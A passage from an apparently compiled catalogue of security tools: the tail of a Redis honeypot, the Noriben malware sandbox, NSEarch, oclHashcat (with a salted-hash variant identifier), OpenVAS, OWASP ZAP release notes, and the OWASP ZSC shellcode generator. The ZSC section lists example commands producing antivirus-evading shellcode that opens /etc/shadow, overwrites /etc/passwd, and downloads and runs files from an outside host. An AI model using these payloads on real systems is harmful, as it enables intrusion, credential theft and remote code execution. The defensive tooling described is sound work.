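        return b"-ERR empty command\r\n"
    cmd = argv[0].upper()
    if cmd == "PING":
        return b"+PONG\r\n"
    if cmd == "INFO":
        return b"$" + str(len(FAKE_INFO)).encode() + CRLF + FAKE_INFO + CRLF
    if cmd in ("SET", "CONFIG", "FLUSHALL", "SAVE", "AUTH", "SELECT", "SLAVEOF"):
        return b"+OK\r\n"                     # pretend every write succeeded
    if cmd == "GET":
        return b"$-1\r\n"                     # nil bulk string: key absent
    return b"-ERR unknown command '" + argv[0].encode("utf-8", "replace") + b"'\r\n"


class HoneypotSession:
    """Per-connection state: reassembles frames and records every command."""

    def __init__(self, peer: str):
        self.peer = peer
        self.buf = b""
        self.log = []                         # (utc timestamp, peer, argv)

    def feed(self, data: bytes) -> bytes:
        """Consume bytes from the client; return the bytes to send back."""
        self.buf += data
        out = b""
        while True:
            try:
                argv, self.buf = parse_resp(self.buf)
            except ValueError:
                self.log.append((self._now(), self.peer, ["<malformed>", self.buf[:64].hex()]))
                self.buf = b""
                return out + b"-ERR Protocol error\r\n"
            if argv is None:
                return out                    # wait for more data
            self.log.append((self._now(), self.peer, argv))
            out += respond(argv)

    @staticmethod
    def _now():
        return datetime.now(timezone.utc).isoformat()


if __name__ == "__main__":
    s = HoneypotSession("203.0.113.7")        # constructed peer address
    for chunk in (b"*1\r\n$4\r\nINFO\r\n", b"*3\r\n$3\r\nSET\r\n$1\r\nx\r\n$5\r\nhello\r\n", b"FLUSHALL\r\n"):
        s.feed(chunk)
    for ts, peer, argv in s.log:
        print(ts, peer, " ".join(argv))
```

Answering +OK to every write is deliberate: automated Redis abuse tooling checks the reply before moving to its next step, so a honeypot that refuses writes sees only the first command of each intrusion.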

Download NoPo
NORIBEN - YOUR PERSONAL, PORTABLE MALWARE
SANDBOX

Noriben is a Python-based script that works in conjunction with
Sysinternals Procmon to automatically collect, analyze, and
report on runtime indicators of malware. In a nutshell, it allows
you to run your malware, hit a keypress, and get a simple text
report of the sample's activities.
Noriben allows you to not only run malware similar to a
sandbox, but also to log system-wide events while you
manually run malware in whatever way is needed to make it run.
For example, it can listen as you run malware that requires
varying command line options. Or, watch the system as you step
through malware in a debugger.
Noriben only requires Sysinternals procmon.exe (or
procmon64.exe) to operate. It requires no pre-filtering (though it
would greatly help) as it contains numerous white list items to
reduce unwanted noise from system activity.

Cool Features
If you have a folder of YARA signature files, you can specify it
with the --yara option. Every new file created will be scanned
against these signatures, with the results displayed in the output
results.
If you have a VirusTotal API key, place it into a file named
"virustotal.api" (or embed it directly in the script) to auto-submit
MD5 file hashes to VT and get the number of positive results.
You can add lists of MD5s to auto-ignore (such as all of your
system files). Use md5deep and throw them into a text file, then
use --hash to read them.
You can automate the script for sandbox usage. Using -t to
automate execution time, and --cmd "path\exe" to specify a
malware file, you can automatically run malware, copy the
results off, and then revert to run a new sample.
The --generalize feature will automatically substitute absolute
paths with Windows environment paths for better IOC
development. For example, C:\Users\malware_user\AppData
\Roaming\malware.exe will be automatically resolved to
%AppData%\malware.exe.
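The point of generalizing is that an indicator tied to one analyst's user name or drive letter never matches on a victim machine. The following is an added example of that rewrite, written for this page and not Noriben's own implementation: it builds a prefix-to-variable table for a given profile (the table itself, the user name malware_user and the sample event lines are assumptions chosen for illustration), matches case-insensitively because NTFS paths are, orders the prefixes most-specific first so %Temp% wins over %LocalAppData%, and refuses to rewrite a path that merely starts with the same characters (C:\Users\malware_user2 is left alone).

```python
"""Rewrite absolute Windows paths in Procmon/Noriben-style event lines to
environment variables (added example, not Noriben code)."""
import re


def build_generalizer(user: str, sysdrive: str = "C:", windir: str = r"C:\Windows"):
    """Return a function that rewrites absolute paths for the given profile.

    The prefix table is an assumption for this example; extend it for the
    image you analyse on. Order matters: longer prefixes come first.
    """
    profile = sysdrive + "\\Users\\" + user
    table = [
        (profile + r"\AppData\Local\Temp", "%Temp%"),
        (profile + r"\AppData\Local", "%LocalAppData%"),
        (profile + r"\AppData\Roaming", "%AppData%"),
        (profile, "%UserProfile%"),
        (sysdrive + r"\ProgramData", "%ProgramData%"),
        (sysdrive + r"\Program Files (x86)", "%ProgramFiles(x86)%"),
        (sysdrive + r"\Program Files", "%ProgramFiles%"),
        (windir, "%WinDir%"),
    ]
    # A prefix only counts at a path boundary: not preceded by a word char or
    # backslash, and followed by a backslash, end of string, or a delimiter.
    compiled = [
        (re.compile(r"(?<![\w\\])" + re.escape(prefix) + r"(?=\\|$|[\s\"'>,;])",
                    re.IGNORECASE), var)
        for prefix, var in table
    ]

    def generalize(text: str) -> str:
        for rx, var in compiled:
            text = rx.sub(var, text)
        return text

    return generalize


# Constructed Noriben-style event lines; not real tool output.
SAMPLE_EVENTS = [
    r"[CreateFile] malware.exe:1234 > C:\Users\malware_user\AppData\Roaming\malware.exe",
    r"[CreateFile] malware.exe:1234 > c:\users\MALWARE_USER\AppData\Local\Temp\drop.tmp",
    r"[CreateProcess] malware.exe:1234 > C:\Windows\System32\cmd.exe /c whoami",
    r"[RegSetValue] malware.exe:1234 > HKCU\Software\Microsoft\Windows\CurrentVersion"
    r"\Run\upd = C:\Users\malware_user\AppData\Roaming\malware.exe",
]


def generalize_events(events, user: str):
    """Apply the rewrite to every event line of a report."""
    g = build_generalizer(user)
    return [g(line) for line in events]


if __name__ == "__main__":
    for line in generalize_events(SAMPLE_EVENTS, "malware_user"):
        print(line)
```

Note that the registry value in the last sample line is rewritten too, because the path appears as data, which is exactly the form a persistence IOC needs; the HKCU\...\Windows\CurrentVersion key path is untouched because it is not prefixed by the drive and Windows directory.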
Usage:
--===[ Noriben v1.6 ]===--
--===[   @bbaskin   ]===--

usage: Noriben.py [-h] [-c CSV] [-p PML] [-f FILTER] [--hash HASH]
                  [-t TIMEOUT] [--output OUTPUT] [--yara YARA] [--generalize]
                  [--cmd CMD] [-d]

optional arguments:
  -h, --help                      show this help message and exit
  -c CSV, --csv CSV               Re-analyze an existing Noriben CSV file
  -p PML, --pml PML               Re-analyze an existing Noriben PML file
  -f FILTER, --filter FILTER      Specify alternate Procmon Filter PMC
  --hash HASH                     Specify MD5 file whitelist
  -t TIMEOUT, --timeout TIMEOUT   Number of seconds to collect activity
  --output OUTPUT                 Folder to store output files
  --yara YARA                     Folder containing YARA rules
  --generalize                    Generalize file paths to their environment
                                  variables. Default: True
  --cmd CMD                       Command line to execute (in quotes)
  -d                              Enable debug tracebacks
Download Noriben
NSEARCH - NMAP SCRIPT ENGINE SEARCH

NSEarch is a tool that helps you find Nmap Scripting Engine
(NSE) scripts. Scripts can be searched by name or category,
and the documentation of the scripts found can be displayed.
USAGE:
$ python nsearch.py

Main Menu

Initial Setup
(every screen below is preceded by the NSEarch ASCII-art
banner, "Version 0.3" and "@jjtibaquira"; the banner is
omitted here)
Creating Database :nmap_scripts.sqlite3
Creating Table For Script ....
Creating Table for Categories ....
Creating Table for Scripts per Category ....
Upload Categories to Categories Table ...

Main Console
nsearch>

Basic Commands
nsearch> help
Nsearch Commands
================
clear
doc
exit
help
history
last
search
nsearch>

nsearch> help search
name     : Search by script's name
category : Search by category

Usage:
search name:http
search category:exploit
nsearch>

nsearch> search name:ssh
1.ssh-hostkey.nse
2.ssh2-enum-algos.nse
3.sshv1.nse
nsearch>

nsearch> doc ssh <TAB>
ssh-hostkey.nse    ssh2-enum-algos.nse    sshv1.nse

nsearch> doc sshv1.nse

local nmap = require "nmap"
local shortport = require "shortport"
local string = require "string"
description = [[
Checks if an SSH server supports the obsolete and
less secure SSH Protocol Version 1.
]]
author = "Brandon Enright"
nsearch>

DownloadNSEarch
OCLHASHCAT V2.01 - WORLDS FASTEST PASSWORD
CRACKER

oclHashcat is the world's fastest and most advanced GPGPU-based
password recovery utility, supporting five unique modes
of attack for over 170 highly-optimized hashing algorithms.
oclHashcat currently supports AMD (OpenCL) and Nvidia
(CUDA) graphics processors on GNU/Linux and Windows
7/8/10, and has facilities to help enable distributed password
cracking.

FEATURES

World's fastest password cracker
World's first and only GPGPU based rule engine
Free
Open-Source
Multi-GPU (up to 128 gpus)
Multi-Hash (up to 100 million hashes)
Multi-OS (Linux & Windows native binaries)
Multi-Platform (OpenCL & CUDA support)
Multi-Algo (see below)
Low resource utilization, you can still watch movies or
play games while cracking
Focuses on highly iterated modern hashes
Focuses on dictionary based attacks
Supports distributed cracking
Supports pause / resume while cracking
Supports sessions
Supports restore
Supports reading words from file
Supports reading words from stdin
Supports hex-salt
Supports hex-charset
Built-in benchmarking system
Integrated thermal watchdog
... and much more

ATTACK-MODES
Straight *
Combination
Brute-force
Hybrid dict + mask
Hybrid mask + dict
* accept Rules

ALGORITHMS

MD4
MD5
Half MD5 (left, mid, right)
SHA1
SHA-256
SHA-384
SHA-512
SHA-3 (Keccak)
SipHash
RipeMD160
Whirlpool
GOST R 34.11-94
GOST R 34.11-2012 (Streebog) 256-bit
GOST R 34.11-2012 (Streebog) 512-bit
Double MD5
Double SHA1
md5($pass.$salt)
md5($salt.$pass)
md5(unicode($pass).$salt)
md5($salt.unicode($pass))
md5(sha1($pass))
md5($salt.md5($pass))
md5($salt.$pass.$salt)
md5(strtoupper(md5($pass)))
sha1($pass.$salt)
sha1($salt.$pass)
sha1(unicode($pass).$salt)
sha1($salt.unicode($pass))
sha1(md5($pass))
sha1($salt.$pass.$salt)
sha256($pass.$salt)
sha256($salt.$pass)
sha256(unicode($pass).$salt)

sha256($salt.unicode($pass))
sha512($pass.$salt)
sha512($salt.$pass)
sha512(unicode($pass).$salt)
sha512($salt.unicode($pass))
HMAC-MD5 (key = $pass)
HMAC-MD5 (key = $salt)
HMAC-SHA1 (key = $pass)
HMAC-SHA1 (key = $salt)
HMAC-SHA256 (key = $pass)
HMAC-SHA256 (key = $salt)
HMAC-SHA512 (key = $pass)
HMAC-SHA512 (key = $salt)
PBKDF2-HMAC-MD5
PBKDF2-HMAC-SHA1
PBKDF2-HMAC-SHA256
PBKDF2-HMAC-SHA512
MyBB
phpBB3
SMF
vBulletin
IPB
Woltlab Burning Board
osCommerce
xt:Commerce
PrestaShop
Mediawiki B type
Wordpress
Drupal
Joomla
PHPS
Django (SHA-1)
Django (PBKDF2-SHA256)
EPiServer
ColdFusion 10+
Apache MD5-APR

MySQL
PostgreSQL
MSSQL
Oracle H: Type (Oracle 7+)
Oracle S: Type (Oracle 11+)
Oracle T: Type (Oracle 12+)
Sybase
hMailServer
DNSSEC (NSEC3)
IKE-PSK
IPMI2 RAKP
iSCSI CHAP
Cram MD5
MySQL Challenge-Response Authentication (SHA1)
PostgreSQL Challenge-Response Authentication (MD5)
SIP Digest Authentication (MD5)
WPA
WPA2
NetNTLMv1
NetNTLMv1 + ESS
NetNTLMv2
Kerberos 5 AS-REQ Pre-Auth etype 23
Netscape LDAP SHA/SSHA
LM
NTLM
Domain Cached Credentials (DCC), MS Cache
Domain Cached Credentials 2 (DCC2), MS Cache 2
MS-AzureSync PBKDF2-HMAC-SHA256
descrypt
bsdicrypt
md5crypt
sha256crypt
sha512crypt
bcrypt
scrypt
OSX v10.4

OSX v10.5
OSX v10.6
OSX v10.7
OSX v10.8
OSX v10.9
OSX v10.10
AIX {smd5}
AIX {ssha1}
AIX {ssha256}
AIX {ssha512}
Cisco-ASA
Cisco-PIX
Cisco-IOS
Cisco $8$
Cisco $9$
Juniper IVE
Juniper Netscreen/SSG (ScreenOS)
Android PIN
GRUB 2
CRC32
RACF
Radmin2
Redmine
Citrix Netscaler
SAP CODVN B (BCODE)
SAP CODVN F/G (PASSCODE)
SAP CODVN H (PWDSALTEDHASH) iSSHA-1
PeopleSoft
Skype
7-Zip
RAR3-hp
PDF 1.1 - 1.3 (Acrobat 2 - 4)
PDF 1.4 - 1.6 (Acrobat 5 - 8)
PDF 1.7 Level 3 (Acrobat 9)
PDF 1.7 Level 8 (Acrobat 10 - 11)
MS Office <= 2003 MD5
MS Office <= 2003 SHA1
MS Office 2007
MS Office 2010
MS Office 2013
Lotus Notes/Domino 5
Lotus Notes/Domino 6
Lotus Notes/Domino 8
Bitcoin/Litecoin wallet.dat
Blockchain, My Wallet
1Password, agilekeychain
1Password, cloudkeychain
Lastpass
Password Safe v2
Password Safe v3
eCryptfs
Android FDE <= 4.3
TrueCrypt 5.0+
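Much of the list above consists of the same digest with the salt placed differently: md5($pass.$salt) versus md5($salt.$pass), $salt.$pass.$salt, the UTF-16 "unicode" variants, and nested forms such as md5(sha1($pass)). Picking the wrong variant wastes a whole GPU run, so before cracking a dump it pays to recompute every candidate construction for one account whose password is already known (a test user, a reset account) and see which one reproduces the stored hash. The block below is an added example of that check, not oclHashcat code; it assumes UTF-8 passwords and salts, takes "unicode($pass)" to mean UTF-16LE as in hashcat, and uses the hash:salt input layout hashcat expects for salted modes.

```python
"""Which salted construction produced this hash? (added example, not oclHashcat code)"""
import hashlib


def _hex(alg: str, data: bytes) -> str:
    return hashlib.new(alg, data).hexdigest()


def digest_variants(password: str, salt: str) -> dict:
    """Return {variant name: hex digest} for the plain-salted constructions
    listed above, using the same names oclHashcat uses for them."""
    p, s = password.encode("utf-8"), salt.encode("utf-8")
    u = password.encode("utf-16-le")      # hashcat's unicode($pass) (assumption)
    out = {}
    for alg in ("md5", "sha1", "sha256", "sha512"):
        out[f"{alg}($pass.$salt)"] = _hex(alg, p + s)
        out[f"{alg}($salt.$pass)"] = _hex(alg, s + p)
        out[f"{alg}(unicode($pass).$salt)"] = _hex(alg, u + s)
        out[f"{alg}($salt.unicode($pass))"] = _hex(alg, s + u)
    md5p, sha1p = _hex("md5", p), _hex("sha1", p)
    out["md5($salt.$pass.$salt)"] = _hex("md5", s + p + s)
    out["sha1($salt.$pass.$salt)"] = _hex("sha1", s + p + s)
    out["md5(sha1($pass))"] = _hex("md5", sha1p.encode())      # inner digest as hex text
    out["sha1(md5($pass))"] = _hex("sha1", md5p.encode())
    out["md5($salt.md5($pass))"] = _hex("md5", s + md5p.encode())
    out["md5(strtoupper(md5($pass)))"] = _hex("md5", md5p.upper().encode())
    out["Double MD5"] = _hex("md5", md5p.encode())
    out["Double SHA1"] = _hex("sha1", sha1p.encode())
    return out


def identify(hash_hex: str, salt: str, password: str) -> list:
    """Names of every variant that reproduces hash_hex for the known pair.
    Several names can match (e.g. with an empty salt), so callers should
    confirm with a second known account."""
    target = hash_hex.strip().lower()
    return [name for name, h in digest_variants(password, salt).items() if h == target]


def identify_line(line: str, password: str) -> list:
    """Accept the hash:salt layout hashcat uses for salted modes."""
    h, _, s = line.partition(":")
    return identify(h, s, password)


if __name__ == "__main__":
    # Constructed dump line: the hash of "password" with salt "salt" in one of the variants.
    line = digest_variants("password", "salt")["md5($salt.$pass)"] + ":salt"
    print(line, "->", identify_line(line, "password"))
```

A variant that matches on one account but not a second indicates the salt is not what the dump's column suggests (per-row salts stored elsewhere, or a site-wide pepper), which is worth knowing before choosing a hash mode.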

DownloadoclHashcat v2.01
OPENVAS - THE WORLD'S MOST ADVANCED OPEN
SOURCE VULNERABILITY SCANNER AND MANAGER

The Open Vulnerability Assessment System (OpenVAS) is a
framework of several services and tools. The core of this
SSL-secured service-oriented architecture is the OpenVAS
Scanner. The scanner very efficiently executes the actual
Network Vulnerability Tests (NVTs), which are served with daily
updates via the OpenVAS NVT Feed or via a commercial feed
service.

The OpenVAS Manager is the central service that consolidates
plain vulnerability scanning into a full vulnerability management
solution. The Manager controls the Scanner via OTP
(OpenVAS Transfer Protocol) and itself offers the XML-based,
stateless OpenVAS Management Protocol (OMP). All
intelligence is implemented in the Manager so that it is possible
to implement various lean clients that will behave consistently,
e.g. with regard to filtering or sorting scan results. The Manager
also controls a SQL database (sqlite-based) where all
configuration and scan result data is centrally stored. Finally,
the Manager also handles user management, including access
control with groups and roles.

Different OMP clients are available: The Greenbone Security
Assistant (GSA) is a lean web service offering a user interface
for web browsers. GSA uses an XSL transformation stylesheet
that converts OMP responses into HTML.

OpenVAS CLI contains the command line tool "omp", which
allows you to create batch processes to drive OpenVAS Manager.
Another tool in this package is a Nagios plugin.

Most of the tools listed above share functionality that is
aggregated in the OpenVAS Libraries.
The OpenVAS Scanner offers the communication protocol OTP
(OpenVAS Transfer Protocol), which allows the scan execution
to be controlled. This protocol is expected to be replaced
eventually, and thus it is not recommended to develop OTP
clients.
FEATURE OVERVIEW

OpenVAS Scanner
Many target hosts are scanned concurrently
OpenVAS Transfer Protocol (OTP)
SSL support for OTP (always)
WMI support (optional)
...

OpenVAS Manager
OpenVAS Management Protocol (OMP)
SQL Database (sqlite) for configurations and scan results
SSL support for OMP (always)
Many concurrent scan tasks (many OpenVAS Scanners)
Notes management for scan results
False Positive management for scan results
Scheduled scans
Flexible escalators upon status of a scan task
Stop, Pause and Resume of scan tasks
Master-Slave Mode to control many instances from a central one
Report Format Plugin Framework with various plugins for: XML, HTML, LaTeX, etc.
User Management
Feed status view
Feed synchronisation
...

Greenbone Security Assistant (GSA)
Client for OMP and OAP
HTTP and HTTPS
Web server on its own (microhttpd), thus no extra web server required
Integrated online-help system
Multi-language support
...

OpenVAS CLI
Client for OMP
Runs on Windows, Linux, etc.
Plugin for Nagios
...
Download OpenVAS
OWASP ZAP 2.4.0 - PENETRATION TESTING TOOL FOR
TESTING WEB APPLICATIONS

ZAP is an OWASP Flagship project, and is currently the most
active open source web application security tool.

Some of the most significant changes include:

ATTACK MODE

A new attack mode has been added, which means that
applications you have specified as being in scope are actively
scanned as they are discovered.
ADVANCED FUZZING

A completely new fuzzing dialog has been introduced that
allows multiple injection points to be attacked at the same time,
as well as introducing new attack payloads, including the option
to use scripts for generating the payloads as well as pre- and
post-attack manipulation and analysis.
SCAN POLICIES

Scan policies define exactly which rules are run as part of an
active scan.
They also define how these rules run influencing how many
requests are made and how likely potential issues are to be
flagged.
The new Scan Policy Manager dialog allows you to create,
import and export as many scan policies as you need. You
select any scan policy when you start an active scan and also
specify the one used by the new attack mode.
Scan policy dialog boxes allow sorting by any column, and
include a quality column (indicating if individual scanners are
Release, Beta, or Alpha quality).
SCAN DIALOGS WITH ADVANCED OPTIONS

New Active Scan and Spider dialogs have replaced the increasing number of right click 'Attack' options. These provide easy access to all of the most common options and optionally a wide range of advanced options.
HIDING UNUSED TABS

By default only the essential tabs are now shown when ZAP
starts up.
The remaining tabs are revealed when they are used (e.g. for
the spider and active scanner) or when you display them via
the special tab on the far right of each window with the green '+'
icon. This special tab disappears if there are no hidden tabs.
Tabs can be closed via a small 'x' icon which is shown when the tab is selected.
Tabs can also be 'pinned' using a small 'pin' icon that is also shown when the tab is selected - pinned tabs will be shown when ZAP next starts up.
NEW ADD-ONS

Two significant new alpha quality add-ons are available:
Access Control Testing: adds the ability to automate many aspects of access control testing.
Sequence Scanning: adds the ability to scan 'sequences' of web pages, in other words pages that must be visited in a strict order in order to work correctly.
These can both be downloaded from the ZAP Marketplace.
NEW SCAN RULES

A number of significant new alpha quality scanners are available:
Relative Path Confusion: Allows ZAP to scan for issues that may result in XSS, by detecting if the browser can be fooled into interpreting HTML as CSS.
Proxy Disclosure: Allows ZAP to detect forward and reverse proxies between the ZAP instance and the origin web server / application server.
Storability / Cacheability: Allows ZAP to passively determine whether a page is storable by a shared cache, and whether it can be served from that cache in response to a similar request. This is useful from both a privacy and application performance perspective. The scanner follows RFC 7234.
Support has also been added for Direct Web Remoting as an input vector for all scan rules.
CHANGED SCAN RULES

External Redirect: This plugin's ID has been changed from 30000 to 20019, in order to more closely align with the established groupings. (This change may be of importance to **API Users**). Additionally some minor changes have been implemented to prevent collisions between injected values and in-page content, and improve performance. (Issues: 1529 and 1569)
Session ID in URL Rewrite: This plugin has been updated with a minimum length check for the value of the parameters it looks for. A false positive condition was raised related to this plugin (Issue 1396) whereby sID=5 would trigger a finding. The minimum length for session IDs as this plugin interprets them is now eight (8) characters.
Client Browser Cache: The active scan rule TestClientBrowserCache has been removed. Checks performed by the passive scan rule CacheControlScanner have been slightly modified. (Issue 1499)

MORE USER INTERFACE CHANGES

The ZAP splash screen is back: It now includes new graphics, a tips & tricks module, and loading/progress info.
The active scan dialog shows the real plugin progress status based on the number of nodes that need to be scanned.
There is a new session persistence options dialog that prompts the user for their preferred settings at startup (you can choose to Remember the option and not be asked again).
For all Alerts the Risk field (False Positive, Suspicious, Warning) has been replaced with a more appropriately defined Confidence field (False Positive, Low, Medium, High, or Confirmed).
Timestamps are now optionally available for the output tab.

EXTENDED API SUPPORT

The API now supports the spidering and active scanning of multiple targets concurrently, the management of scan policies, as well as even more of the ZAP functionality.
INTERNATIONALIZED HELP ADD-ONS

The help files are internationalized via https://crowdin.net/project/owasp-zap-help.
If you use ZAP in one of the many languages we support, then look on the ZAP Marketplace to see if the help files for that language are available. These will include all of the available translations for that language while defaulting back to English for phrases that have not yet been translated.
RELEASE NOTES

See the Release Notes (https://code.google.com/p/zaproxy/wiki/HelpReleases2_4_0) for a full list of all of the changes included in this release.

Download ZAP 2.4.0

OWASP ZAP 2.4.1 - PENETRATION TESTING TOOL FOR TESTING WEB APPLICATIONS

The OWASP Zed Attack Proxy (ZAP) is an easy to use integrated penetration testing tool for finding vulnerabilities in web applications.
It is designed to be used by people with a wide range of security experience and as such is ideal for developers and functional testers who are new to penetration testing, as well as being a useful addition to an experienced pen tester's toolbox.

Release 2.4.1

This release includes important security fixes - users are urged to upgrade asap.
One of the changes means that an API key is created by default, which means that any applications using the ZAP API will fail unless they are updated to use that key. The API key can be found in the API Options screen. You can also set it from the command line using an option like:
-config api.key=change-me-9203935709

For more details see https://github.com/zaproxy/zaproxy/wiki/FAQapikey
The following changes were made in this release:
Enhancements:
Issue 321 : Support multiple databases
Issue 1459 : Add an HTTP sender listener script
Issue 1500 : Update Bouncy Castle libs
Issue 1566 : Improve active scan's reported progress
Issue 1573 : Add option to inject plugin ID in header for all
ascan requests
Issue 1607 : Unable to save the test session via API
Issue 1621 : AScan API - Allow to scan as an user
Issue 1625 : Support multiple structural params and ones
on top level nodes
Issue 1653 : Support context menu key for trees
Issue 1655 : Copy Session Token from Http Sessions tab
to clipboard
Issue 1662 : Add default Rails anti-CSRF token parameter
Issue 1664 : Clients tab autoscroll
Issue 1684 : Unable to set technology via API
Issue 1688 : Updating owasp/zap2docker image with
Python Client API
Issue 1690 : Bump key pair size to 2048 for all certs in the (proxy's) chain of trust
Issue 1695 : Change SSL cert signature algorithm to "SHA-256 with RSA Encryption"
Issue 1699 : Allow ApiImplementor's to add custom
headers
Issue 1715 : Unable to pass arguments when launching
ZAP from the command line on Mac OS X
Issue 1728 : Update JRE to 1.7u79 (CPU) for MacOS

Bug fixes:
Issue 444 : Guaranteed NPE on AliasCertificate.getName() if getCN()==null
Issue 1442 : Up/Down arrow keys in results stop working if
"reflected"
Issue 1473 : Spider does not handle URLs extracted from
meta tags correctly
Issue 1497 : The spider is extracting and reporting links from comments - even when instructed not to do so
Issue 1598 : startup script lacks support for FreeBSD
Issue 1615 : Search "All" option not working
Issue 1617 : ZAP 2.4.0 throws HeadlessExceptions when
running in daemon mode on headless machine
Issue 1618 : Target Technology Not Honored
Issue 1619 : Search regex might not be validated
Issue 1624 : Error while loading ZAP 2.4.0
Issue 1626 : Structural parameters not saved when
context exported and not available via the API
Issue 1636 : Users (for auth) & Forced User not loaded
from session
Issue 1647 : Wrong reference in Zest Result
Issue 1674 : Ajax spider not considering get parameters
Issue 1677 : Fuzzers can't be expanded on OS X
Issue 1694 : "Error: setting file is missing. Program will
exit." even if file exists
Issue 1698 : Escape API exceptions
Issue 1700 : Forced Browse Lists Missing from DropDown in 2.4.0
Issue 1706 : Add API security options
Issue 1708 : Context's technology tree can get out of sync
Issue 1709 : Applications are not (immediately) shown
after start
Issue 1714 : PNH should not reflect API key unless user
supplies it
Issue 1716 : Restrict use of CORS header in pnh
Issue 1720 : Add more security options for JSONP API
Issue 1724 : Ensure API component names are escaped
in the HTML output
Issue 1735 : Context's technologies not used in active
scan unless overridden

Download OWASP ZAP 2.4.1

OWASP ZSC SHELLCODER - GENERATE CUSTOMIZED SHELLCODES

OWASP ZSC is open source software written in Python which lets you generate customized shellcode for the listed operating systems. It can be run on Windows, Linux/Unix, OS X and other operating systems under Python 2.7.x.
Description

Usage of shellcodes
Shellcodes are small pieces of assembly code which can be used as the payload in software exploitation. Other uses are in malware, antivirus bypass, obfuscated code, etc.
Why use OWASP ZSC?

Compared to other shellcode generators such as the Metasploit tools, OWASP ZSC uses new encoders and methods which antiviruses won't detect. The OWASP ZSC encoders are able to generate shellcode with random encodings, which lets you get thousands of new dynamic shellcodes for the same job in just a second; that means you will not get the same code if you use random encodes with the same commands, and that makes OWASP ZSC one of the best. It will also generate shellcode for many more operating systems in the next versions.
Help Menu
Switches:
-h, --h, -help, --help => to see this help guide
-os => choose your os to create shellcode
-oslist => list os for switch -os
-o => output filename
-job => what shellcode gonna do for you ?
-joblist => list of -job switch
-encode => generate shellcode with encode
-types => types of encode for -encode switch
-wizard => wizard mod
-update => check for update
-about => about software and developers.

With these switches you can see the OS list, encode types and functions [joblist] to generate your shellcode.
OS List "-oslist"
[+] linux_x86
[+] linux_x64
[+] linux_arm
[+] linux_mips
[+] freebsd_x86
[+] freebsd_x64
[+] windows_x86
[+] windows_x64
[+] osx
[+] solaris_x86
[+] solaris_x64

Encode Types "-types"
[+] none
[+] xor_random
[+] xor_yourvalue
[+] add_random
[+] add_yourvalue
[+] sub_random
[+] sub_yourvalue
[+] inc
[+] inc_timesyouwant
[+] dec
[+] dec_timesyouwant
[+] mix_all

Functions "-joblist"
[+] exec('/path/file')
[+] chmod('/path/file','permission number')
[+] write('/path/file','text to write')
[+] file_create('/path/file','text to write')
[+] dir_create('/path/folder')
[+] download('url','filename')
[+] download_execute('url','filename','command to execute')
[+] system('command to execute')
[+] script_executor('name of script','path and name of your script in your pc','execute command')

Now you are able to choose your operating system, function and encode to generate your shellcode, but not all of these features are activated yet, so you have to look up the table HERE to see which features are activated.

For example, this part of the table tells us that all functions for linux_x86 are activated, but the encodes [xor_random, xor_yourvalue, add_random, add_yourvalue, sub_random, sub_yourvalue, inc, inc_timesyouwant, dec, dec_timesyouwant] are only activated for the chmod() function.
Examples
>zsc -os linux_x86 -encode inc -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode inc_10 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode dec_30 -job "chmod('/etc/passwd','777')" -o file
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode xor_0x41414141 -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode xor_0x45872f4d -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_random -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode add_0x41414141 -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_random -job "chmod('/etc/passwd','777')" -o file.txt
>zsc -os linux_x86 -encode sub_0x41414141 -job "chmod('/etc/passwd','444')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello.txt','hello')" -o file.txt
>zsc -os linux_x86 -encode none -job "file_create('/root/Desktop/hello2.txt','hello[space]world[space]!')" -o file.txt
>zsc -os linux_x86 -encode none -job "dir_create('/root/Desktop/mydirectory')" -o file.txt
>zsc -os linux_x86 -encode none -job "download('http://www.z3r0d4y.com/exploit.type','myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','./myfile.type')" -o file.txt
#multi command
>zsc -os linux_x86 -encode none -job "download_execute('http://www.z3r0d4y.com/exploit.type','myfile.type','chmod[space]777[space]myfile.type;sh[space]myfile.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('script.type','D:\\myfile.type','./script.type')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('z3r0d4y.sh','/root/z3r0d4y.sh','sh[space]z3r0d4y.sh')" -o file.txt
>zsc -os linux_x86 -encode none -job "script_executor('ali.py','/root/Desktop/0day.py','chmod[space]+x[space]ali.py;[space]python[space]ali.py')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]la')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('ls[space]la[space]/etc/shadow;chmod[space]777[space]/etc/shadow;ls[space]-la[space]/etc/shadow;cat[space]/etc/shadow;wget[space]file[space];chmod[space]777[space]file;./file')" -o file.txt
>zsc -os linux_x86 -encode none -job "system('wget[space]file;sh[space]file')" -o file.txt
>zsc -os linux_x86 -encode none -job "chmod('/etc/shadow','777')" -o file.txt
>zsc -os linux_x86 -encode none -job "write('/etc/passwd','user:pass')" -o file.txt
>zsc -os linux_x86 -encode none -job "exec('/bin/bash')" -o file.txt

Note: Don't use spaces in the system() function; replace them with [space], the software will detect and replace them for you in the shellcode.
Note: script_executor(), download_execute(), download(), dir_create() and file_create() use the Linux command line [wget, mkdir, echo], not the function. The system() function has been added in the script; you can use it to do anything and generate any command line shellcode.
Note: exec() doesn't support any ARGV such as exec(/bin/bash -c ls) or exec(/bin/bash,-c,ls); you have to wait for the next version, and this feature will be available in system().
Note: you can also use a high value for the inc and dec times, like inc_100000, but your shellcode may get too big.
Note: each time you execute the chmod() [or any other] function with a random encode, you will get random output and a different shellcode.
Note: your xor value can be anything; xor_0x41414141 and xor_0x45872f4d are examples.
Wizard Switch
With the -wizard switch you are able to generate shellcode without long ARGVs; the software will ask you for the information.

Note: While you are using the -wizard switch, if you press Enter without typing anything, the default value will be set on the variable.
Note: By entering "list", the list of values will be shown.
Available Features

add length calculator for output
